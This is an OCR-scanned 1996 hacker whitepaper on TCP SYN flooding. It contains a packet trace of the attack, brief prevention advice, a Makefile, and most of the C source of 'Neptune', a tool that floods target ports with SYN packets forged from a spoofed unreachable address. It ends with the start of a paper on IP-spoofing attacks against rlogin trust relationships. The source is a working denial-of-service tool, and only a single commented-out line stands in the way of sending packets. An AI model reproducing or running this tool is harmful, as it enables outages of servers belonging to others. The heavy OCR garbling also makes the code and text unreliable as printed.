42.291 onyx ash TCP/23 Joes, Een 0, seq:339849651 
0, win 242, src 192.168.2.10 192 T6822 277 IP 

42.311 onyx ash TCP/23 66:4105-0 45 © ENS 0, seq:341527373 
0, win 242, src 192.168.2.10 192°.1,68::2.°7 IP 

42.331 onyx ash TCP/23 eS Hen? 0, seq:343205094 
0, win 242, src 192.168.2.10 192.168.2.7 IP 

42.351 onyx ash TCP/23 vets ¢Sep Lene 0, seq:344882816 
0, win 242, src 192.168.2.10 192.168.2.7 IP 

42.371 onyx ash TCP/23 we 8S, ben: 0, seq:346560537 
0, win 242, src 192.168.2.10 192.168.2.7 IP 

42.391 onyx ash TCP/23 2 imvS.op “ene 0, segq:348238259 
0, win 242, src 192.168.2.10 199 168.0254 IP 

42.411 onyx ash TCP/23 Lf Sc dens 0, seq:349915981 
0, win 242, src 192.168.2.10 192.168.2.7 IP 

42.431 onyx ash TCP/23 dss See ene 0, seq:351593702 
0, win 242, src 192.168.2.10 192 1685-221 IP 

The next 9 of 10 SYNs. The telnet daemon on ash is now flooded. 

At this point, another telnet client is started on Onyx. 

47.227 onyx *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2. 

Onyx is again attempting to get ash’s ethernet address using ARP. 

Hmmm, this entry should be in the arp cache. I should look into 

this. 

47.228 ash onyx ARP_RARP ARP: Reply, Target IP: 192.168.2.2 


0020AF2311D7 


Here is the ARP reply. 
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146 47.228 onyx ash TCP/23 aie Sa Lene 4, seq:362535863 
8, ack: Q;, wins 512, src 192.168.2.2 192.168.2.7 IP 
147 50.230 onyx ash TCP/23 iia Sice Lene 4, seq:362535863 
8, ack: Q, win:14335, sre 192.168.2652 192.168.2.7 IP 
148 56.239 onyx ash TCP/23 wees Sep ene 4, seq:362535863 
8, ack: 0, win:14335, sre 192.168.2.2 192.168.2.7 IP 

Onyx is attempting to establish a connection with the telnet daemon 

on Ash, which is, as we saw, flooded. 


149 67.251 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2. 
10 

Ash is still trying to get th thernet address of the spoofed host. 

In vain... 
150 68.247 onyx ash TCP/23 $i vieSa, Len: 4, seq:362535863 
8, ack: 0, win:14335, sre 192.168.2.2 192.168.2.7 IP 
151 92.254 onyx ash TCP/23 soe Sap salen 4, seq:362535863 
8, ack: 0, win:14335, sre 192.168.2.2 192.168.2.7 IP 


Onyx is still transmitting it’s connection-estabishment requests... 
Also in vain. 


152 92.258 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2. 
10 


Hello? Are you out there? 


Section VI. Neptune.c 
Neptune.c is the companion code. It does everything we’ve talked 
about, and more. Neptune.c is admittedly more complex than it needs to 
be. I included several features that are not essential, but make the 


program more robust. [The program features: simple to use menuing system, an 
alternative command line interface for easy integration into scripts, 
ICMP_ECHO requesting to query if unreachable is in fact unreachable (AKA 
‘ping’ing), infinity mode (read the code) and a daemon mode with (psuedo) 
random unreachable IP address choosing. 


The menu is really self explanatory... 


al Enter target host 
Enter yur target. If you are confused at this point, kill yurself. 
2 Enter source (unreachable) host 


Enter the puported sender. It is integral that this host be routable but not 
reachable. Remember that the address must be a unicast address. If it is a 
broadcast or multicast address it will be dropped by the target TCP. 


3 Send ICMP_ECHO(s) to unreachable 


Make sure that yur puported sender is in fact unreachable. This is not 100% 
reliable as A) ICMP packets can be dropped by the unreliable network layer, 
B) the host may filter out ICMP_ECHO packets. 


4 Enter port number to flood 


The target port to flood. There is an infinity switch. 


iS) Enter number of SYNs 
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The number of SYNs to send. Remember, this attack is not bandwidth hungry, 
sending more packets than neccessary is totally useless. 


6 Quit 
Bye, bye. 
¥, Lanuch 


Fire when ready. 
8 Daemonize (may or may not be implemented in yur version) 


Puts the program in dameon mode. It forks to the background and does it’s 
vilness there. Needs two more options: packet sending interval, and time 
for daemon to live. Recommended packet sending interval is at least every 
90 seconds, depending on the target TCP. 80 should work fine, as the 
connection establishment timer is 75 seconds. Daemon lifetime is up to you. 
Be kind. 


Also the daemon portion includes routines to optionally make use 
of a file of unreachable IP addresses and (pseudo) randomly choose from 
them. The program reads the file and builds a dynamic array of these IP 
addresses in network byte order and then uses rand (seeded from the time of 
day in seconds --we don’t need alot of entropy here, this isn’t 
cryptography-—-) to generate a number and then it mods that number by the 
number of entries in the table to hash to a particular IP address. 


Since the program opens raw sockets, it needs to run as root. By 
default, it is installed SUID root in /usr/local/bin/neptune with the access 
list in /etc/sfaccess.conf. The authentication mechanism works by checking 
the usernames (via UID) of the attempted flooders. It is not a complex 
algorithm, and in fact the code is quite simple (asside: If anyone can find 
any security problems with the program being SUID root, --above the fact 
that the program is admittedly evil-- I would love to hear about them). Root 
is the only entry the access file starts off with. 

For the program to work, you need to remove the comment marks from 
line 318 (the actual sendto() call where the forged datagrams are sent). I 
did that so the fools simply interested in causing trouble (and not interested 
in learning) would find the program mostly useless. 


Section VII. Discussion and Prevention 


As we have seen, the attack works because TCP is attempting to do it’s 
job of providing a reliable transport. TCP must establish a connection first, 
and this is where the weakness lies. (T/TCP is immune to this attack via TAO. 
See my future paper: ‘The Next Generation Internet* for information on T/TCP 
and IPng.) Under normal circumstances, assuming well-behaved networking 
software, the worst that can happen is a TCP-based server may be wrapped up in 
legimate connection-establishment processing and a few clients may have to 
retransmit thier SYNs. But, a misbegotten client program can exploit this 
connection-establishment weakness and down a TCP-based server with only a few 
doctored segments. 

The fact that SYN flooding requires such a small amount of network 
traffic to be so effective is important to note. Consider other network 
DOS attacks such as ICMP_ECHO floods (ping floods), mail bombs, mass mailing 
list subscriptions, etc... To be effective, all of these attacks require 
an attacker to transmit volumous amounts of network traffic. Not only does 
this make these attacks more noticable on both ends by decreasing the amount 
of available bandwidth (as such, often these attacks are waged from compromised 
machines) but it also adds to the general traffic problems of the Internet. 
SYN flooding can be deadly effective with as little as 360 packets/hour. 


--[ Prevention ]-- 
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Ok, so how do we stop it? Good question. 


== [ ICPd J== 
TCP wrappers are almost useless. The magic they do is based on the 
validity of the source IP-address of incoming datagrams. As we know, this can 
be spoofed to whatever the attacker desires. Unless the target has denied 


traffic from *everywhere* except known hosts, TCP wrappers will not save you. 


--[ Increase the Backlog ]-- 


Increasing the default backlog is not much of a solution. In 
comparision with the difficulty of an attacker simply sending more packets, 
the memory requirements of the additional connection-establishment structures 
is prohibitively expensive. At best it is an obfuscative (word check...?) 
measure. 


--[ Packet Filtering ]-- 


A smart packet filter (or kernel modification) of some kind may be 
a viable solution. Briefly: 


- Host keeps a recent log of incoming packets with the ‘SYN* bit on ina 
linked list structure. 

-— The linked list cannot be permitted to grow without bound (another DOS 
attack would present itself) 

— When x amount of SYNs are received on a socket, certain characteristics 
about the packets are compared, (Source port, source IP address, sequenc 
numbers, window size, etc) and if things seem fishy, the connection 
requests and associated memory structures are immediately destroyed. 


Section VIII. References 


Pols A. Cox, R. Stevens 
Books: TCP Illustrated vols II,III 


This project made possible by a grant from the Guild Corporation. 


KOF 


8< 


Neptune Makefil 
daemon9, 1996 Guild Productions 


all: 
@gcc -o neptune neptune.c 
@echo "" 
@echo "’make install’ will install the program..." 
@echo "" 
@echo "Warning! Neptune is installed SUID root by default!" 


@echo "" 
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@echo "route@infonexus.com / Guild Corporation" 
install: 
strip ./neptune 

mv ./neptune /usr/local/bin/neptune 

chmod 4755 /usr/local/bin/neptune 

@echo "root" > /etc/sfaccess.conf 

@echo "Installation complete, access list is /etc/sfaccess.conf" 


clean: 
@rm -f *.0 neptune /etc/sfaccess.conf 
8< 
/* 
Neptune 
Wey dh 5 


daemon9/route/infinity 
June 1996 Guild productions 
comments to daemon9@netcom.com 
If you found this code alone, without the companion whitepaper 


please get the real-deal: 
ftp.infonexus.com/pub/SourceAndShell/Guild/Route/Projects/Neptune/neptune.tgz 


Brief synopsis: 
Floods the target host with TCP segments with the SYN bit on, 
puportedly from an unreachable host. The return address in the 
IP header is forged to be that of a known unreachable host. The 
attacked TCP, if flooded sufficently, will be unable to respond 
to futher connects. See the accompanying whitepaper for a full 
treatment of the topic. (Also see my paper on IP-spoofing for 
information on a related subject.) 


Usage: 
Figure it out, kid. Menu is default action. Command line usage is 
available for easy integration into shell scripts. If you can’t 
figure out an unreachable host, the program will not work. 

Gripes: 


It would appear that flooding a host on every port (with the 
infinity switch) has it’s drawbacks. So many packets are trying to 
make their way to the target host, it seems as though many are 
dropped, especially on ethernets. Across the Internet, though, the 
problem appears mostly mitigated. The call to usleep appears to fix 
this... Coming up is a port scanning option that will find open 
ports... 


Version History: 

6/17/96 betal: SYN flooding, Cmd line and crude menu, ICMP stuff broken 

6/20/96 beta2: Better menu, improved SYN flooding, ICMP fixed... sorta 

6/21/96 beta3: Better menu still, fixed SYN flood clogging problem 
Fixed some name-lookup problems 

6/22/96 beta4: Some loop optimization, ICMP socket stuff changed, ICMP 
code fixed 


6/23/96 1.0: First real version... 

6/25/96 1.1: Cleaned up some stuff, added authentication hooks, fixed up 
input routine stuff 

7/01/96 1.5: Added daemonizing routine... 


This coding project made possible by a grant from the Guild corporation 
AY 


#include <stdio.h> 
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include <stdlib.h> 
include <string.h> 
include <syslog.h> 
include <pwd.h> 
include <unistd.h> 
include <netinet/in.h> 
include <arpa/inet.h> 
ly 
aL 
1 
cL 
1 
1 
1 
1 
1 


include <netdb.h> 
include <sys/socket.h> 
include <sys/ioctl.h> 
include <fcntl.h> 
include <time.h> 


nclude <linux/signal.h> 
nclude <linux/ip.h> 
nclude <linux/tcp.h> 
nclude <linux/icmp.h> 
define BUFLEN 256 
define MENUBUF 64 
define MAXPORT 1024 
define MAXPAK 4096 
define MENUSLEEP 700000 
define FLOODSLEEP 100 /* Ethernet, or WAN? Yur mileage will vary.*/ 
define ICMPSLEEP 100 
define ACCESSLIST "/etc/sfaccess.conf" 
int HANDLERCODE=1; 


R 
int KEEPQUIET=0; 
char werd[]={"\nThis code made possible by a grant from the Guild Corporation\n\0"}; 
void main(argc, argv) 

int argc; 

char *argv[]; 


{ 


void usage(char *); 

void menu(int,char *); 

void flood(int, unsigned, unsigned,u_short,int); 
unsigned nameResolve(char *); 

int authenticate (int,char *); 


unsigned unreachable,target; 
int c,port,amount, sockl1, fd; 
struct passwd *passEnt; 

char t[20],u[20]; 


if ((fd=open (ACCESSLIST,O_RDONLY) ) <=0) { 
perror("Cannot open accesslist"); 
exit (1); 


} 

setpwent (); 
passEnt=getpwuid(getuid()); 
endpwent (); 


/* Authenticate */ 
if (!authenticate (fd, passEnt—>pw_name) ) { 
fprintf(stderr,"Access Denied, kid\n"); 
exit (0); 


/* Open up a RAW socket */ 


if ((sockl=socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) <0) { 
perror("\nHmmm.... socket problems\n") ; 
exit(1); 


} 

if (argc==1) { 
menu (sockl,passEnt—>pw_name) ; 
exit (0); 
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/* Parse command-line arguments */ 


while ((c=getopt (argc,argv,"8:s:t:p:a"))){ 
switch (c) { 
case 's': /* Source (spoofed) host */ 


unreachable=nameResolve (optarg) ; 
strcpy (u,optarg) ; 
break; 

case /t’: /* Target host */ 
target=nameResolve (optarg) ; 
strcpy (t,optarg); 


break; 

case 'p’: /* Target port */ 
port=atoi(optarg) ; 
break; 

case '8’: /* infinity switch */ 
port=0; 
break; 

case 'a’: /* Amount of SYNs to send */ 
amount=atoi(optarg); 
break; 

default: /* WTF? */ 


usage (argv[0]); 
} 


if('port) { 
printf("\n\nFlooding target: \t\t%u\nOn ports\t\t\t1-%d\nAmount: \t\t\t%u\n 
Puportedly from: \t\t%u \n",target,MAXPORT, amount, unreachable) ; 
flood(sock1l,unreachable,target,0, amount) ; 
} 
elsef{ 
printf("\n\nFlooding target: \t\t%u\nOn port: \t\t\t%u\nAmount: \t\t\t%u\nP 
uportedly from: \t\t%u \n",target,port, amount, unreachable) ; 
flood(sockl,unreachable,target,port,amount) ; 


} 
syslog (LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Nu 


mber:%d\n",getpid(),passEnt->pw_name,t,u,port, amount) ; 
printf (werd) ; 


exit (0); 
} /* End main */ 
/* 
x Authenticate. Makes sure user is authorized to run program. 
* 
ay 
int authenticate (fd, nameID) 
int fd; 


char *nameID; 


{ 


char buf [BUFLEN+1]; 
char workBuffer[10]; 
int i=0, 3=0; 


while (read(fd,buf, sizeof (buf) )) { 
if (! (strstr (buf,nameID) ) 

close (fd); 
syslog (LOG_LOCAL6|LOG_INFO,"Failed authentication for %s\n",nameID) 


{ 


return(0); 


else { 
close (fd); 
syslog (LOG_LOCAL6|LOG_INFO, "Successful start by %s, PID: %d\n",name 


ID, getpid()); 
return(1); 
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Flood. 
construction occurs here, 


This is main workhorse of the program. 
as does flooding. 


IP and TCP header 


void flood(int sock,unsigned sadd,unsigned dadd,u_short dport,int amount) { 


unsigned short in_cksum(unsigned short *,int); 


struct packet { 
struct iphdr ip; 
struct tcphdr tcp; 
}packet; 


struct pseudo_header { f% 


For TCP header checksum */ 


unsigned int source_address; 


unsigned int dest_address; 

unsigned char placeholder; 

unsigned char protocol; 

unsigned short tcp_length; 

struct tcphdr tcp; 
}pseudo_header; 


struct sockaddr_in sin; fe 
register int i=0, j=0; pe 
int tsunami=0; Ae 
unsigned short sport=16l+getpid(); 


if (!dport) { 
tsunamitt; /* 


IP address information */ 
Counters */ 
flag */ 


GOD save them... */ 


fprintf(stderr, "\nTSUNAMI!\n") ; 


fprintf(stderr, "\nflooding 


port:"); 


/* Setup the sin struct with addressing information */ 


sin.sin_family=AF_INET; i 
sin.sin_port=sport; fe 
sin.sin_addr.s_addr=dadd; fs 


/* Packet assembly 
/* Fill in 
packet.tcp.source=sport; ee 


packet.tcp.dest=htons (dport); fs 
packet.tcp.seq=49358353+getpid(); 


packet .tcp.ack_seq=0; /% 
packet.tcp.doff=5; /* 
packet.tcp.res1=0; fe 
packet.tcp.res2=0; fe 
packet.tcp.urg=0; [sé 
packet .tcp.ack=0; /* 
packet.tcp.psh=0; /* 
packet.tcp.rst=0; fx 
packet.tcp.syn=1; ee 
packet.tcp.fin=0; /* 
packet.tcp.window=htons (242); 

packet .tcp.check=0; 1% 


packet .tcp.urg_ptr=0; fe 
/* Fill in 
packet.ip.version=4; /* 


packet .ip.ihl=5; fe 
packet.ip.tos=0; is 


Internet address family */ 
Source port */ 
Dest. address */ 


begins here */ 
all the TCP header information */ 


16-bit Source port number */ 
16-bit Destination port */ 

/* 32-bit Sequence Number */ 
32-bit Acknowledgement Number */ 
Data offset */ 
reserved */ 
reserved */ 

Urgent offset valid flag */ 
Acknowledgement field valid flag */ 
Push flag */ 

Reset flag */ 
Synchronize sequenc 
Finish sending flag */ 


/* 16-bit Window size */ 
(to be filled in below) 


16-bit checksum 
16-bit urgent offset */ 


all the IP header information */ 
4-bit Version */ 


4-bit Header Length */ 
8-bit Type of service */ 


numbers flag */ 


af 
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packet.ip.tot_len=htons (40); /* 16-bit Total length */ 

packet .ip.id=getpid(); /* 16-bit ID field */ 

packet.ip.frag_off=0; /* 13-bit Fragment offset */ 

packet .ip.tt1=255; /* 8-bit Time To Live */ 
packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */ 

packet .ip.check=0; /* 16-bit Header checksum (filled in below) */ 
packet.ip.saddr=sadd; /* 32-bit Source Address */ 
packet.ip.daddr=dadd; /* 32-bit Destination Address */ 


/* Psuedo-headers needed for TCP hdr checksum (they 
do not change and do not need to be in the loop) */ 


pseudo_header.source_address=packet.ip.saddr; 
pseudo_header.dest_address=packet.ip.daddr; 
pseudo_header.placeholder=0; 
pseudo_header.protocol=IPPROTO_TCP; 
pseudo_header.tcp_length=htons (20); 


while (1) { /* Main loop */ 
if (tsunami) { 

if (j==MAXPORT) { 

tsunami=0; 

break; 
} 
packet.tcp.dest=htons (++]j); 
fprintf(stderr, "Sd", 4); 
fprintf(stderr, "%Sc",0x08) ; 
if (j>=10) fprintf(stderr, "Sc",0x08) ; 
if (j>=100) fprintf(stderr, "Sc",0x08); 
if (j>=1000) fprintf(stderr, "%c",0x08) ; 
if (j>=10000) fprintf(stderr, "%c",0x08) ; 


for (i=0;i<amount;it++){ /* Flood loop */ 


/* Certian header fields should change */ 


packet .tcp.sourcett+; /* Source port inc */ 

packet .tcp.seqt+t; /* Sequence Number inc */ 
packet.tcp.check=0; /* Checksum will need to change */ 
packet.ip.id++; /* ID number */ 

packet.ip.check=0; /* Checksum will need to change */ 


/* IP header checksum */ 

packet.ip.check=in_cksum((unsigned short *) &packet.ip,20); 

/* Setup TCP headers for checksum */ 

beopy ((char *) &packet.tcp, (char *) &pseudo_header.tcp, 20); 

/* TCP header checksum */ 

packet.tcp.check=in_cksum((unsigned short *) &pseudo_header, 32); 
/* As it turns out, if we blast packets too fast, many 

get dropped, as the receiving kernel can’t cope (at 


least on an ethernet). This value could be tweaked 
prolly, but that’s up to you for now... */ 


usleep (FLOODSLEEP) ; 


/* This is where we sit back and watch it all come together */ 


/*sendto (sock, &packet, 40,0, (Struct sockaddr *)&sin, sizeof (sin) );*/ 
if (!tsunami&&!KEEPQUIET) fprintf(stderr,"."); 


} 


if (!'tsunami) break; 
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/* 
bat IP Family checksum routine (from UNP) 
*/ 
unsigned short in_cksum(unsigned short *ptr,int nbytes) { 
register long sum; /* assumes long == 32 bits */ 
u_short oddbyte; 
register u_short answer; /* assumes u_short == 16 bits */ 
/* 


Our algorithm is simple, using a 32-bit accumulator (sum), 
* we add sequential 16-bit words to it, and at the end, fold back 
all the carry bits from the top 16 bits into the lower 16 bits. 


* / 
sum = 0; 
while (nbytes > 1) {f{ 
sum += *ptrt++; 
nbytes -= 2; 
} 
/* mop up an odd byte, if necessary */ 
if (nbytes == 1) { 
oddbyte = 0; /* make sure top half is zero */ 
*((u_char *) &0ddbyte) = * (u_char *)ptr; /* one byte only */ 
sum += oddbyte; 
} 
/* 
* Add back carry outs from top 16 bits to low 16 bits. 
a 
sum = (sum >> 16) + (sum & Oxffff); /* add high-16 to low-16 */ 
sum += (sum >> 16); /* add carry */ 
answer = ~sum; /* ones-complement, then truncate to 16 bits */ 


return (answer); 


/* 
x Converts IP addresses 
ay, 


unsigned nameResolve(char *hostname) { 


struct in_addr addr; 
struct hostent *hostEnt; 


if ((addr.s_addr=inet_addr (hostname) ) ==-1) { 
if(! (hostEnt=gethostbyname (hostname) ) ) { 
fprintf(stderr,"Name lookup failure: ‘%s*\n",hostname) ; 
exit (0); 


} 
bcopy (hostEnt-—>h_addr, (char *) &éaddr.s_addr,hostEnt->h_length) ; 


} 


return addr.s_addr; 


/* 
i. Menu function. Nothing suprising here. Except that one thing. 
a. 

void menu(sockl1,nameID) 

int sockl; 

char *nameID; 
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int slickPing(int,int,char *); 
void flood(int, unsigned, unsigned,u_short, int); 
unsigned nameResolve(char *); 
void demon(int,char *,char *,int,int,int,int); 


int i,sock2,menuLoop=1,icmpAmt, port, amount, interval,ttl; 


char optflags[7]={0}; /* So we can keep track of the options */ 
static char tmp [MENUBUF+1]={0},target [MENUBUF+1]={0},unreach [MENUBUF+1]={0}; 
while (menuLoop) 
printf ("\n\n\t\t\t[ SYNflood Menu JATNENENE [ daemon9 ]\n\n"); 
if (!optflags[0])printf("1\t\tEnter target host\n"); 
else printf£("[1]\t\tTarget:\t\t\t%s\n",target) ; 
if ('optflags[1])printf("2\t\tEnter source (unreachable) host\n"); 
else printf("[2]\t\tUnreachable:\t\t%s\n",unreach) ; 
if (!optflags[2])printf("3\t\tSend ICMP_ECHO(s) to unreachable\n"); 
else printf("[3]\t\tUnreachable host:\tverified unreachable\n"); 
if (!optflags[3])printf("4\t\tEnter port number to flood\n"); 
else if (port) printf ("({4]\t\tFlooding:\t\t%d\n",port) ; 
else printf("[4]\t\tFlooding:\t\t1-1024\n"); 
if (!optflags[4])printf("5\t\tEnter number of SYNs\n"); 
else printf("[5]\t\tNumber SYNs:\t\t%d\n", amount) ; 
printf ("\n6\t\tQuit\n"); 
if (optflags[0]&éoptflags[1]é&optflags[3]&&optflags[4])printf("7\t\tLaunch A 
ttack\n"); 
if (optflags[0]&éoptflags[1]&&optflags[3]&&optflags[4]) printf ("8\t\tDaemoniz 
e\n") = 
printf ("\n\n\n\n\n\n\n\n\n\n\n\n") ; 
fgets (tmp, BUFLEN/2, stdin); /* tempered input */ 
switch (atoi (tmp) ) { 
case 1: 
printf("[hostname]-> "); 
fgets (target, MENUBUF, stdin) ; 
i=0; 
if (target [0]==’ \n’) break; 
while (target [i]!=’\n’) i++; 
target [i]=0; 
optflags[0]=1; 
break; 
case 2: 
printf("[hostname]-> "); 
fgets (unreach, MENUBUF, stdin) ; 
i=0; 
if (unreach[0]==’ \n’) break; 
while (unreach[i]!=’\n’)it+; 
unreach[i]=0; 
optflags[1]=1; 
break; 
case 3: 
if (!loptflags[1]) { 
fprintf(stderr,"Um, enter a host first\n"); 
usleep (MENUSLEEP) ; 
break; 
} 
/* Raw ICMP socket */ 
if ((sock2=socket (AF_INET, SOCK_RAW, IPPROTO_ICMP) ) <0) { 
perror("\nHmmm.... socket problems\n"); 
exit(1); 
} 
printf("[number of ICMP_ECHO’s]-> "); 
fgets (tmp, MENUBUF, stdin) ; 
if (! (icmpAmt=atoi (tmp) )) break; 
if (slickPing (icmpAmt, sock2,unreach) ) { 
fprintf(stderr,"Host is reachable... Pick a new one 
WI) 
sleep(1); 


optflags[1]=0; 
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optflags[2]=0; 
HANDLERCODE=1 
close (sock2); 
break; 


} 
optflags[2]=1; 
close (sock2); 
break; 

case 4: 
printf("[port number]-> "); 
fgets (tmp, MENUBUF, stdin) ; 
port=atoi (tmp) ; 
optflags[3]=1; 
break; 


case 5: 
printf("[number of SYNs]-> "); 
fgets (tmp, MENUBUF, stdin) ; 
i1f(! (amount=atoi (tmp) )) break; 
optflags[4]=1; 
break; 
case 6: 
menuLoop--; 
break; 
case 7: 
if (optflags[0]&éoptflags[1]&&optflags[3]&&optflags[4]) { 
syslog (LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s 
Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),nameID,target,unreach, port, amount) ; 
flood(sockl,nameResolve (unreach) ,nameResolve (target 


),port,amount) ; 
menuLoop--; 


} 


else{ 
fprintf(stderr,"Illegal option --try again\n"); 
usleep (MENUSLEEP) ; 

} 

break; 

case 8: 

if (optflags[0]&éoptflags[1]&é&optflags[3]&&optflags[4]) { 

if(!'port) { 
fprintf(stderr,"Cannot set infinity flag in 
daemon mode. Sorry.\n"); 


5 


usleep (MENUSL 
break; 


1EP*2); 


} 


printf("[packet sending interval in seconds {80}]-> 


fgets (tmp, MENUBUF, stdin) ; 
if (! (interval=atoi (tmp) ))interval=80; 
printf("[time for daemon to live in whole hours (0=f 


orever)]-> "); 

fgets (tmp, MENUBUF, stdin) ; 

ttl=atoi (tmp); 

syslog (LOG_LOCAL6|LOG_INFO,"DFLOOD: PID: %d, User:% 
s Target:%s Unreach:%s Port:%d Number:%d Interval: %$d TTL: %d\n",getpid(),nameID,target,unr 
each, port, amount, interval,ttl); 


demon (sockl1,unreach,target,port, amount, interval,ttl 
i 


exit (0); 

} 

else{ 
fprintf(stderr,"Illegal option --try again\n"); 
usleep (MENUSLEEP ) ; 

} 

break; 


default: 
fprintf(stderr,"Illegal option --try again\n"); 
usleep (MENUSLEEP) ; 
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} 


} 

printf ("\n"); 
printf (werd) ; 
return; 


SlickPing. A quick and dirty ping hack. Sends <amount> ICMP_ECHO 
packets and waits for a reply on any one of them... It has to check 
to make sure the ICMP_ECHOREPLY is actually meant for us, as raw ICMP 
sockets get ALL the ICMP traffic on a host, and someone could be 
pinging some other host and we could get that ECHOREPLY and foul 
things up for us. 


int slickPing (amount, sock, dest) 
int amount, sock; 
char *dest; 


{ 


int alarmHandler(); 
unsigned nameResolve(char *); 


register int retcode, j=0; 

struct icmphdr *icmp; 

struct sockaddr_in sin; 

unsigned char sendICMPpak [MAXPAK]={0}; 
unsigned short pakID=getpid() &O0xffff; 


struct ippkt{ 
struct iphdr ip; 
struct icmphdr icmp; 
char buffer [MAXPAK]; 
}pkt; 


bzero((char *)&sin,sizeof(sin)); 
sin.sin_family=AF_INET; 
sin.sin_addr.s_addr=nameResolve (dest) ; 


/* ICMP Packet assembly */ 
/* We let the kernel create our IP header as it is legit */ 


icmp=(struct icmphdr *) sendICMPpak; 


icmp->type=ICMP_ECHO; /* Requesting an Echo */ 
icmp->code=0; /* 0 for ICMP ECHO/ECHO_REPLY */ 
icmp->un.echo.id=pakID; /* To identify upon return */ 
icmp->un.echo.sequence=0; /* Not used for us */ 


icmp->checksum=in_cksum((unsigned short *) icmp, 64); 


fprintf(stderr,"sending ICMP_ECHO packets: "); 
for (; j<amount; jt+t) { 
usleep (ICMPSLEEP) ; /* For good measure */ 


retcode=sendto (sock, sendICMPpak, 64,0, (Struct sockaddr *) &sin,sizeof(sin)); 
if (retcode<0| | retcode!=64) 
if (retcode<0O) { 
perror ("ICMP sendto err"); 
exit(1); 


} 
else fprintf(stderr,"Only wrote %d bytes", retcode) ; 
else fprintf(stderr,"."); 

} 
HANDLERCODE=1; 
signal (SIGALRM, alarmHandler) ; /* catch the ALARM and handle it */ 
fprintf(stderr,"\nSetting alarm timeout for 10 seconds...\n"); 
alarm(10)j; /* ALARM is set b/c read() will block forever if no */ 
while(1) { /* packets arrive... (which is what we want....) */ 
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read(sock, (struct ippkt *) &pkt,MAXPAK-1); 
if (pkt.icmp.type==ICMP_ECHOREPLY&&icmp-—>un.echo.id==pakID) { 


if (! HANDLERCODE) return (0); 
return(1); 


/* 
* SIGALRM signal handler. Souper simple. 
*/ 


int alarmHandler () { 


HANDLERCODE=0; /* shame on me for using global vars */ 
alarm(0); 

signal (SIGALRM, SIG_DFL) ; 

return(0); 


/* 
* Usage function... 
a 
void usage (nomenclature) 
char *nomenclature; 
{ 


= 


fprintf (stderr,"\n\nUSAGE: %s \n\t-s unreachable_host \n\t-t target_host \n\t-p por 


t [-8 (infinity switch)] \n\t-a amount_of_SYNs\n",nomenclature) ; 
exit (0); 
} 
/* 
* Demon. Backgrounding procedure and looping stuff. 
*/ 


void demon(sock, unreachable, target,port,amount, interval,ttl) 
int sock; 

char *unreachable; 

char *target; 

Int; port; 

int amount; 

int interval; 

int ttl; 


fprintf(stderr,"\nSorry Daemon mode not available in this version\n"); 
exit (0); 
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comments to route@infonexus.com 


The purpose of this paper is to explain IP-spoofing to the 
masses. It assumes little more than a working knowledge of Unix and 
TCP/IP. Oh, and that yur not a moron... 

IP-spoofing is complex technical attack that is made up of 
several components. (In actuality, IP-spoofing is not the attack, but 
a step in the attack. The attack is actually trust-relationship 
exploitation. However, in this paper, 1IP-spoofing will refer to the 
whole attack.) In this paper, I will explain the attack in detail, 
including the relevant operating system and networking information. 


[SECTION I. BACKGROUND INFORMATION] 


[ The Players ] 


A: Target host 

Be Trusted host 

X: Unreachable host 

Z: Attacking host 

(1) 2: Host 1 masquerading as host 2 


--[ The Figures ]-- 


There are several figures in the paper and they are to be 
interpreted as per the following example: 


ick host a control host b 

Hf A -—--SYN---> B 

tick: A tick of time. There is no distinction made as to *how* 

much time passes between ticks, just that time passes. It’s generally 


not a great deal. 

host a: A machine particpating in a TCP-based conversation. 
control: This field shows any relevant control bits set in the TCP 
header and the direction the data is flowing 

host b: A machine particpating in a TCP-based conversation. 


In this case, at the first refrenced point in time host a is sending 
a TCP segment to host b with the SYN bit on. Unless stated, we are 
generally not concerned with the data portion of the TCP segment. 


--[ Trust Relationships ]J-- 


In the Unix world, trust can be given all too easily. Say you 
have an account on machine A, and on machine B. To facilitate going 
betwixt the two with a minimum amount of hassle, you want to setup a 
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full-duplex trust relationship between them. In your home directory 
at A you create a .rhosts file: ‘echo "B username" > ~/.rhosts* In 
your home directory at B you create a .rhosts file: ‘echo "A username" 
> “/.rhosts* (Alternately, root can setup similar rules in 
/etc/hosts.equiv, the difference being that the rules are hostwide, 
rather than just on an individual basis.) Now, you can use any of the 
r* commands without that annoying hassle of password authentication. 
These commands will allow address-based authentication, which will 
grant or deny access based off of the IP address of the service 
requestor. 


--[ Rlogin ]-- 


Rlogin is a simple client-server based protocol that uses TCP 
as it’s transport. Rlogin allows a user to login remotely from one 
host to another, and, if the target machine trusts the other, rlogin 
will allow the convienience of not prompting for a password. It will 
instead have authenticated the client via the source IP address. So, 
from our example above, we can use rlogin to remotely login to A from 
B (or vice-versa) and not be prompted for a password. 


--[ Internet Protocol ]-- 


IP is the connectionless, unreliable network protocol in the 
TCP/IP suite. It has two 32-bit header fields to hold address 
information. IP is also the busiest of all the TCP/IP protocols as 
almost all TCP/IP traffic is encapsulated in IP datagrams. IP’s job 
is to route packets around the network. It provides no mechanism for 
reliability or accountability, for that, it relies on the upper 
layers. IP simply sends out datagrams and hopes they make it intact. 
If they don’t, IP can try to send an ICMP error message back to the 
source, however this packet can get lost as well. (ICMP is Internet 
Control Message Protocol and it is used to relay network conditions 
and different errors to IP and the other layers.) IP has no means to 
guarantee delivery. Since IP is connectionless, it does not maintain 
any connection state information. Each IP datagram is sent out without 
regard to the last one or the next one. This, along with the fact that 
it is trivial to modify the IP stack to allow an arbitrarily choosen IP 
address in the source (and destination) fields make IP easily subvertable. 


--[ Transmission Control Protocol ]-- 


TCP is the connection-oriented, reliable transport protocol 
in the TCP/IP suite. Connection-oriented simply means that the two 
hosts participating in a discussion must first establish a connection 
before data may change hands. Reliability is provided in a number of 
ways but the only two we are concerned with are data sequencing and 
acknowledgement. TCP assigns sequence numbers to every segment and 
acknowledges any and all data segments recieved from the other end. 
(ACK’s consume a sequence number, but are not themselves ACK’d.) 

This reliability makes TCP harder to fool than IP. 


[ Sequence Numbers, Acknowledgements and other flags ]-- 


Since TCP is reliable, it must be able to recover from 
lost, duplicated, or out-of-order data. By assigning a sequence 
